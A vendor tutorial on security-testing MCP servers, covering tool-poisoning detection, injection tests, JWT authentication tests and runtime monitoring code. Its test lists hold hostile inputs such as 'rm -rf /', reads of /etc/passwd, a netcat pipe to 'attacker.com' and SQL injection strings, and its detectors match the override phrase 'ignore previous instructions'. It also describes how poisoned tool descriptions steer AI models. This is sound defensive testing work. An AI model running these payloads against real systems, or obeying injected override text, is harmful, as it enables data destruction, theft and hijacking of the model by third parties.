Security tests for MCP server endpoints

Kashish Hora

Kashish Hora

Co-founder of MCPcat

Try out MCPcat

The Quick Answer

Test MCP server security by scanning for tool poisoning attacks, validating input sanitization, and verifying authentication flows:

# Install MCP security scanner
$npm install -g @invariantlabs/mcp-scan
 
# Run comprehensive security scan
$mcp-scan --server ./server.js --mode full
# Test for command injection vulnerabilities
def test_command_injection():
    malicious_input = "test; rm -rf /"
    response = mcp_client.call_tool("execute", {
        "command": malicious_input
    })
    assert "permission denied" in response.error

MCP servers face unique security challenges from tool poisoning and prompt injection attacks. Regular security testing prevents data exfiltration and unauthorized system access.

Prerequisites

  • Node.js 18+ or Python 3.8+ installed
  • MCP server implementation to test
  • Basic understanding of JSON-RPC protocol
  • Access to security testing tools (mcp-scan, pytest)

Installation

Install the essential security testing tools for comprehensive MCP server validation:

# MCP security scanner for automated vulnerability detection
$npm install -g @invariantlabs/mcp-scan
 
# Python testing framework with security extensions
$pip install pytest pytest-security mcp-client
 
# JSON-RPC fuzzing tool for protocol testing
$npm install -g rpc-fuzzer

Understanding MCP Security Threats

MCP servers operate as bridges between AI models and sensitive systems, creating unique attack vectors. Tool poisoning attacks embed malicious instructions within tool descriptions that remain invisible to users but influence AI behavior. Command injection vulnerabilities arise when servers pass unsanitized inputs to system commands or databases.

The most critical threats include Full-Schema Poisoning (FSP), where attackers manipulate entire tool schemas beyond just descriptions. This extends to tool names, parameter types, default values, and enumeration options. Traditional security measures often miss these vectors because they focus solely on input validation rather than schema integrity.

Tool Poisoning Detection

Tool poisoning represents the most insidious threat to MCP servers. Attackers hide malicious prompts within tool metadata that AI models process but users never see. These attacks bypass traditional security controls by exploiting the trust relationship between models and tool descriptions.

import json
from mcp_client import MCPClient

def detect_tool_poisoning(server_url):
    """Scan MCP server tools for hidden malicious instructions"""
    client = MCPClient(server_url)
    tools = client.list_tools()
    
    suspicious_patterns = [
        r"ignore previous instructions",
        r"<system>.*</system>",
        r"IMPORTANT:.*MUST",
        r"\x1b\[.*m",  # ANSI escape sequences
        r"base64\.b64decode"
    ]
    
    vulnerabilities = []
    
    for tool in tools:
        # Check all schema fields, not just descriptions
        schema_text = json.dumps(tool, default=str)
        
        for pattern in suspicious_patterns:
            if re.search(pattern, schema_text, re.IGNORECASE):
                vulnerabilities.append({
                    "tool": tool["name"],
                    "pattern": pattern,
                    "severity": "high"
                })
    
    return vulnerabilities

# Usage in test suite
def test_no_tool_poisoning():
    vulns = detect_tool_poisoning("http://localhost:8000")
    assert len(vulns) == 0, f"Found tool poisoning: {vulns}"

Advanced poisoning techniques use Unicode homoglyphs or zero-width characters to hide payloads. The detection must examine raw bytes rather than rendered text. Schema validation should enforce strict typing and reject fields containing linguistic instructions disguised as configuration.

Input Validation Testing

MCP servers frequently execute system commands or database queries based on AI-generated inputs. Without proper sanitization, these become vectors for command injection attacks. Testing must verify that all user inputs undergo appropriate validation before processing.

// Comprehensive input validation test suite
const { MCPTestClient } = require('@mcp/test-utils');

describe('Input Validation Security', () => {
  let client;
  
  beforeEach(() => {
    client = new MCPTestClient('http://localhost:3000');
  });
  
  test('prevents command injection in shell tools', async () => {
    const maliciousInputs = [
      'valid.txt; cat /etc/passwd',
      'test`whoami`',
      'file$(rm -rf /)',
      'test\nrm -rf /',
      'test|nc attacker.com 4444'
    ];
    
    for (const input of maliciousInputs) {
      const response = await client.callTool('file_read', {
        path: input
      });
      
      // Should either sanitize or reject malicious input
      expect(response.error || response.sanitized).toBeTruthy();
      expect(response.output).not.toContain('passwd');
    }
  });
  
  test('prevents SQL injection in database tools', async () => {
    const sqlInjectionPayloads = [
      "'; DROP TABLE users; --",
      "1' OR '1'='1",
      "admin'--",
      "1; INSERT INTO admins VALUES ('hacker', 'password')"
    ];
    
    for (const payload of sqlInjectionPayloads) {
      const response = await client.callTool('db_query', {
        query: `SELECT * FROM users WHERE id = '${payload}'`
      });
      
      // Must use parameterized queries
      expect(response.error?.code).toBe('INVALID_QUERY');
    }
  });
});

Effective input validation combines multiple layers: type checking, length limits, character whitelisting, and context-aware sanitization. The server should log all rejected inputs for security monitoring while avoiding information disclosure in error messages.

Authentication Flow Testing

MCP servers implementing OAuth 2.0 or custom authentication require thorough testing of token handling, session management, and authorization boundaries. Security tests must verify that authentication cannot be bypassed and that tokens properly scope access.

import asyncio
import jwt
from datetime import datetime, timedelta

class MCPAuthTester:
    def __init__(self, server_url, auth_endpoint):
        self.server_url = server_url
        self.auth_endpoint = auth_endpoint
    
    async def test_token_validation(self):
        """Verify server properly validates JWT tokens"""
        test_cases = []
        
        # Test 1: Expired token
        expired_token = jwt.encode({
            "exp": datetime.utcnow() - timedelta(hours=1),
            "sub": "test_user"
        }, "wrong_secret", algorithm="HS256")
        
        test_cases.append({
            "name": "expired_token",
            "token": expired_token,
            "expected_error": "TOKEN_EXPIRED"
        })
        
        # Test 2: Invalid signature
        invalid_sig_token = jwt.encode({
            "exp": datetime.utcnow() + timedelta(hours=1),
            "sub": "test_user"
        }, "wrong_secret", algorithm="HS256")
        
        test_cases.append({
            "name": "invalid_signature",
            "token": invalid_sig_token,
            "expected_error": "INVALID_SIGNATURE"
        })
        
        # Test 3: Missing required claims
        incomplete_token = jwt.encode({
            "exp": datetime.utcnow() + timedelta(hours=1)
            # Missing 'sub' claim
        }, "correct_secret", algorithm="HS256")
        
        test_cases.append({
            "name": "missing_claims",
            "token": incomplete_token,
            "expected_error": "MISSING_CLAIMS"
        })
        
        results = []
        for test in test_cases:
            response = await self._make_authenticated_request(
                test["token"]
            )
            results.append({
                "test": test["name"],
                "passed": response.get("error") == test["expected_error"]
            })
        
        return results
    
    async def test_authorization_boundaries(self):
        """Ensure users cannot access resources beyond their scope"""
        # Get tokens with different permission levels
        user_token = await self._get_token("user", ["read"])
        admin_token = await self._get_token("admin", ["read", "write", "delete"])
        
        # Test user cannot perform admin actions
        user_response = await self._call_tool(
            "delete_resource",
            {"id": "sensitive_123"},
            user_token
        )
        assert user_response["error"] == "INSUFFICIENT_PERMISSIONS"
        
        # Test admin can perform restricted actions
        admin_response = await self._call_tool(
            "delete_resource", 
            {"id": "sensitive_123"},
            admin_token
        )
        assert admin_response["success"] == True

Authentication testing extends beyond token validation to session fixation, concurrent session limits, and secure token storage. MCP clients often store tokens in configuration files, requiring tests to verify these are properly encrypted and access-controlled.

Vulnerability Scanning Automation

Automated scanning provides continuous security validation as MCP servers evolve. Integration with CI/CD pipelines ensures vulnerabilities are caught before deployment. Comprehensive scanning combines static analysis, dynamic testing, and behavioral monitoring.

#!/bin/bash
# Automated MCP security scanning pipeline
 
# Static analysis of tool definitions
$echo "Running static security analysis..."
$mcp-scan analyze --server ./dist/server.js \
$ --checks tool-poisoning,schema-validation \
$ --output reports/static-analysis.json
 
# Dynamic runtime testing
$echo "Starting server for dynamic testing..."
$npm start &
$SERVER_PID=$!
$sleep 5
 
# Fuzzing tool inputs
$echo "Fuzzing MCP tool parameters..."
$rpc-fuzzer --target http://localhost:3000/rpc \
$ --wordlist ./security/fuzzing-payloads.txt \
$ --timeout 30 \
$ --report reports/fuzzing-results.json
 
# Authentication bypass attempts
$echo "Testing authentication mechanisms..."
$python -m pytest tests/security/test_auth.py \
$ --json-report --json-report-file=reports/auth-test.json
 
# Cleanup
$kill $SERVER_PID
 
# Generate consolidated report
$mcp-scan report --input reports/ --format html > security-report.html

Modern scanning tools use machine learning to identify novel attack patterns. They analyze response timing to detect blind injection vulnerabilities and monitor resource usage to identify denial-of-service vectors. Regular scanning with updated threat databases ensures protection against emerging attacks.

Runtime Security Monitoring

Production MCP servers require continuous monitoring to detect attacks that bypass initial defenses. Runtime protection combines anomaly detection, rate limiting, and automated response to suspicious activities.

const { MCPSecurityMonitor } = require('@mcp/security');

class ProductionSecurityLayer {
  constructor(mcpServer) {
    this.server = mcpServer;
    this.monitor = new MCPSecurityMonitor();
    this.setupMonitoring();
  }
  
  setupMonitoring() {
    // Track tool invocation patterns
    this.server.on('tool:invoke', async (event) => {
      const analysis = await this.monitor.analyzeInvocation({
        tool: event.tool,
        params: event.params,
        caller: event.session.user,
        timestamp: Date.now()
      });
      
      if (analysis.risk > 0.8) {
        // High risk - block and alert
        event.preventDefault();
        await this.alertSecurityTeam({
          severity: 'critical',
          event: event,
          analysis: analysis
        });
      } else if (analysis.risk > 0.5) {
        // Medium risk - log and rate limit
        await this.monitor.incrementRiskScore(event.session);
        console.warn(`Suspicious activity: ${analysis.reason}`);
      }
    });
    
    // Detect anomalous data access patterns
    this.server.on('data:access', (event) => {
      const accessPattern = this.monitor.getAccessPattern(event.session);
      
      if (accessPattern.isAnomalous) {
        // Possible data exfiltration attempt
        this.applyRateLimit(event.session, {
          requests: 10,
          window: '1m'
        });
      }
    });
    
    // Monitor for privilege escalation
    this.server.on('auth:elevate', async (event) => {
      const legitimateElevation = await this.monitor.verifyElevation({
        user: event.user,
        requestedScope: event.newScope,
        context: event.context
      });
      
      if (!legitimateElevation) {
        event.preventDefault();
        await this.lockAccount(event.user);
      }
    });
  }
}

Effective monitoring correlates events across multiple dimensions: temporal patterns, data volumes, error rates, and user behavior. Machine learning models trained on normal usage patterns can identify subtle attacks that rule-based systems miss.

Common Issues

Error: Tool enumeration exposes sensitive operations

MCP servers often expose all available tools without considering the security implications. Attackers use tool discovery to map attack surfaces and identify high-value targets. Implement tool filtering based on authentication level:

def filter_tools_by_permission(tools, user_permissions):
    """Remove sensitive tools from enumeration based on user permissions"""
    filtered = []
    
    for tool in tools:
        required_perms = tool.get("required_permissions", [])
        if all(perm in user_permissions for perm in required_perms):
            # Strip internal metadata before returning
            public_tool = {
                "name": tool["name"],
                "description": tool["description"],
                "parameters": tool["parameters"]
            }
            filtered.append(public_tool)
    
    return filtered

The solution involves implementing role-based tool visibility and removing internal implementation details from public tool descriptions. This prevents attackers from gathering intelligence about system internals while maintaining functionality for authorized users.

Error: Rate limiting not applied to JSON-RPC batch requests

Batch requests in JSON-RPC allow multiple method calls in a single HTTP request, potentially bypassing rate limits. Attackers exploit this to overwhelm servers or brute-force authentication. Proper rate limiting must account for the total operations within batch requests:

function applyBatchAwareRateLimit(request, rateLimiter) {
  let operationCount = 1;
  
  if (Array.isArray(request)) {
    // Batch request - count all operations
    operationCount = request.length;
  }
  
  // Check if user exceeds rate limit
  const allowed = rateLimiter.checkLimit(
    request.session.userId,
    operationCount
  );
  
  if (!allowed) {
    throw new Error("Rate limit exceeded");
  }
  
  // Process request...
}

Implement rate limiting at multiple levels: per-operation, per-request, and per-session. Consider the computational cost of different operations when setting limits. Database queries might have lower limits than simple data retrievals.

Error: Insecure direct object references in tool parameters

Tools accepting resource IDs without proper authorization checks enable unauthorized access. An attacker might enumerate IDs to access other users' data. Always verify ownership and permissions before processing resource operations:

async def secure_resource_access(resource_id, user_id, operation):
    """Verify user has permission to access resource"""
    # First check if resource exists
    resource = await db.get_resource(resource_id)
    if not resource:
        raise NotFoundException("Resource not found")
    
    # Verify ownership or explicit permissions
    if resource.owner_id != user_id:
        permission = await db.check_permission(
            user_id, 
            resource_id, 
            operation
        )
        if not permission:
            # Log attempted unauthorized access
            await security_log.record({
                "event": "unauthorized_access_attempt",
                "user": user_id,
                "resource": resource_id,
                "operation": operation
            })
            raise ForbiddenException("Access denied")
    
    return resource

Examples

Comprehensive Security Test Suite

A production-ready security test suite for MCP servers combines multiple testing approaches. This example demonstrates integration of tool poisoning detection, input validation, and authentication testing into a unified framework:

import pytest
import asyncio
from mcp_security_tester import SecurityTester

class TestMCPServerSecurity:
    @pytest.fixture
    def security_tester(self):
        return SecurityTester("http://localhost:8000")
    
    @pytest.mark.asyncio
    async def test_complete_security_validation(self, security_tester):
        # Phase 1: Static analysis
        static_results = await security_tester.run_static_analysis()
        assert static_results["tool_poisoning_found"] == 0
        assert static_results["unsafe_patterns_found"] == 0
        
        # Phase 2: Dynamic testing
        dynamic_results = await security_tester.run_dynamic_tests([
            "command_injection",
            "sql_injection", 
            "path_traversal",
            "xxe_injection"
        ])
        
        for test_name, result in dynamic_results.items():
            assert result["blocked"] == True, \
                f"Failed to block {test_name} attack"
        
        # Phase 3: Authentication testing
        auth_results = await security_tester.test_authentication([
            "token_replay",
            "session_fixation",
            "privilege_escalation"
        ])
        
        assert all(r["passed"] for r in auth_results)
        
        # Phase 4: Fuzzing
        fuzz_results = await security_tester.fuzz_parameters(
            iterations=1000,
            timeout=300
        )
        
        assert fuzz_results["crashes"] == 0
        assert fuzz_results["errors_handled"] == fuzz_results["errors_total"]

The test suite executes in CI/CD pipelines before each deployment. It generates detailed reports highlighting specific vulnerabilities and provides remediation guidance. Regular execution ensures security regressions are caught immediately.

Production Security Monitoring Dashboard

Real-world MCP deployments require visibility into security events. This monitoring implementation tracks suspicious activities and provides alerting for security teams:

const express = require('express');
const { MCPServer } = require('@modelcontextprotocol/server');
const { SecurityDashboard } = require('./security-dashboard');

// Initialize MCP server with security monitoring
const server = new MCPServer({
  middleware: [
    securityLogging,
    rateLimiting,
    authenticationCheck
  ]
});

// Security monitoring middleware
async function securityLogging(req, res, next) {
  const startTime = Date.now();
  
  // Capture request details
  const requestInfo = {
    method: req.body.method,
    params: req.body.params,
    ip: req.ip,
    userAgent: req.headers['user-agent'],
    timestamp: new Date()
  };
  
  // Check for suspicious patterns
  const threats = await detectThreats(requestInfo);
  if (threats.length > 0) {
    await dashboard.recordThreat({
      request: requestInfo,
      threats: threats,
      action: 'blocked'
    });
    
    return res.status(403).json({
      error: "Security policy violation"
    });
  }
  
  // Continue with request
  next();
  
  // Log response metrics
  res.on('finish', () => {
    dashboard.recordMetric({
      method: requestInfo.method,
      duration: Date.now() - startTime,
      status: res.statusCode
    });
  });
}

// Threat detection logic
async function detectThreats(requestInfo) {
  const threats = [];
  
  // Check for tool poisoning indicators
  const paramsStr = JSON.stringify(requestInfo.params);
  if (paramsStr.match(/system\]|ignore previous|IMPORTANT:/i)) {
    threats.push({
      type: 'tool_poisoning',
      severity: 'high',
      indicator: 'suspicious_prompt_pattern'
    });
  }
  
  // Detect potential command injection
  if (paramsStr.match(/[;&|`$()]/)) {
    threats.push({
      type: 'command_injection',
      severity: 'medium',
      indicator: 'shell_metacharacters'
    });
  }
  
  // Check request rate
  const recentRequests = await dashboard.getRecentRequests(
    requestInfo.ip,
    60 // last 60 seconds
  );
  
  if (recentRequests > 100) {
    threats.push({
      type: 'rate_limit_abuse',
      severity: 'low',
      indicator: `${recentRequests} requests in 60s`
    });
  }
  
  return threats;
}

// Start monitoring dashboard
const dashboard = new SecurityDashboard({
  port: 3001,
  alertWebhook: process.env.SECURITY_WEBHOOK
});

dashboard.start();

Production monitoring generates actionable insights through correlation of security events. The dashboard visualizes attack patterns, highlights anomalies, and enables rapid incident response. Integration with SIEM systems provides enterprise-wide security visibility.

With monitoring established, security teams can identify attack campaigns targeting MCP infrastructure. Pattern analysis reveals coordinated attempts to exploit specific vulnerabilities across multiple servers. This intelligence drives proactive defense improvements.

Testing Best Practices

Effective MCP security testing follows established methodologies while adapting to protocol-specific challenges. Tests should run continuously, not just during development. Automate wherever possible but maintain human oversight for complex attack scenarios.

Structure tests to fail safely - a broken test should block deployment rather than allow potentially vulnerable code through. Use test data that mirrors production complexity without containing actual sensitive information. Regular rotation of test credentials prevents long-term exposure if test environments are compromised.

Document all security findings with clear reproduction steps and impact assessments. This enables developers to understand and fix issues efficiently. Track metrics like time-to-remediation and vulnerability recurrence to improve security processes over time.

Document all security findings with clear reproduction steps and impact assessments. This enables developers to understand and fix issues efficiently. Track metrics like time-to-remediation and vulnerability recurrence to improve security processes over time.